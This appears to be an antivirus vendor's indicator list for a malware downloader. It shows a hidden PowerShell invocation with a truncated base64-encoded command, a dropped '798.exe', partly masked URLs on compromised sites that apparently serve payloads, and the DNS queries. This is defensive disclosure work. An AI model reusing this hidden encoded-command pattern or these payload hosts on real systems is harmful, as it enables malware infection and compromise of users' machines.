Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABKAGQAeQB1AGsAawBmAHEAPQAnAE4AYQB5AGEAZgBxAHYAZABhAHAAbgBxACcAOwAkAFkAdAB2AHAAeAB2AHMAdQBxAGgAYwB3ACAAPQAgACcANwA5ADgAJwA7ACQATwB6AGEAYQBvAGgAcQB1AGUAcwBoAHIAawA9ACcAUQBpAHEAZAB...
- %HOMEPATH%\798.exe
- %HOMEPATH%\798.exe
- %HOMEPATH%\798.exe
- http://di###genics.com/usi/g/
- http://di###genics.com/cgi-sys/suspendedpage.cgi
- http://al#####ehomepackers.com/wp-admin/c5ffhx/
- http://www.bi######icesvictoria.com/wp-includes.stop/bL/
- http://www.bi######icesvictoria.com/cgi-sys/suspendedpage.cgi
- DNS ASK mo###xtend.com
- DNS ASK di###genics.com
- DNS ASK al#####ehomepackers.com
- DNS ASK bi######icesvictoria.com
- DNS ASK ro####ueennyc.com